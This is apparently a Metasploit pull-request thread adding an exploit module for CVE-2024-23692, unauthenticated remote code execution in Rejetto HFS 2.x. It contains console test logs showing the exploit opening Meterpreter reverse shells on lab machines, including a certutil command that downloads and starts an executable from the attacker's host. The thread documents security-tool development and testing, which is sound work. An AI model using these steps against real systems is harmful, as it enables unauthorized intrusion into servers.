Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)

[sfewer-r7]

This pull request adds an exploit module for CVE-2024-23692, a unauth SSTI in the Rejetto HTTP File Server (HFS).

Original finder has a blog post here, along with a redacted PoC: https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

I wrote a short AKB assessment here: https://attackerkb.com/assessments/f5c5359d-2446-4e33-a1a2-6a66aa2fb5f6

Tested against versions:

• 2.4.0 RC7
• 2.3m

Example usage:

msf6 > use exploit/windows/http/rejetto_hfs_rce_cve_2024_23692
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RHOSTS 192.168.86.35
RHOSTS => 192.168.86.35
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set RPORT 80
RPORT => 80
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 192.168.86.35:80- The target is vulnerable. Rejetto HFS version 2.4.0 RC7
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC7
[*] Sending stage (201798 bytes) to 192.168.86.35
[*] Meterpreter session 1 opened (192.168.86.42:4444 -> 192.168.86.35:32057) at 2024-06-06 18:03:13 +0100

meterpreter > getuid
Server username: testing-vm\user
meterpreter >

[bwatters-r7]

@msjenkins-r7 test this please

[bwatters-r7]

Not sure why Linux sanity tests are failing. It appears not to have retested from my earlier comment.

[bwatters-r7]

@msjenkins-r7 retest this please

[bwatters-r7]

Windows 10x64 22H2

Module options (exploit/windows/http/rejetto_hfs_rce_cve_2024_23692):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                   yes       The base path to the web application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      AWawqlsR         no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set rhost 10.5.132.118
rhost => 10.5.132.118
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > set verbose true
verbose => true
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > check
[+] 10.5.132.118:80 - The target is vulnerable. Rejetto HFS version 2.4.0 RC6
msf6 exploit(windows/http/rejetto_hfs_rce_cve_2024_23692) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\aiRwNUsNR.exe & start /B %TEMP%\aiRwNUsNR.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.4.0 RC6
[*] Client 10.5.132.118 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.118 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.118 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.118 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 10.5.132.118
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.118:49594) at 2024-06-11 09:58:30 -0500

meterpreter > sysinfo
Computer        : DESKTOP-V413087
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole
meterpreter > 

[bwatters-r7]

@sfewer-r7 I'll get this landed once the minor doc suggestions are finished.

[sfewer-r7]

Thanks @bwatters-r7, I have committed those 2 documentation changes so we should be good here :)

[bwatters-r7]

Release Notes

Adds an exploit module for CVE-2024-23692, an unauthorized SSTI in the Rejetto HTTP File Server (HFS).

[cyclestudy]

Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Rejetto HFS version 2.3m
[*] Exploit completed, but no session was created.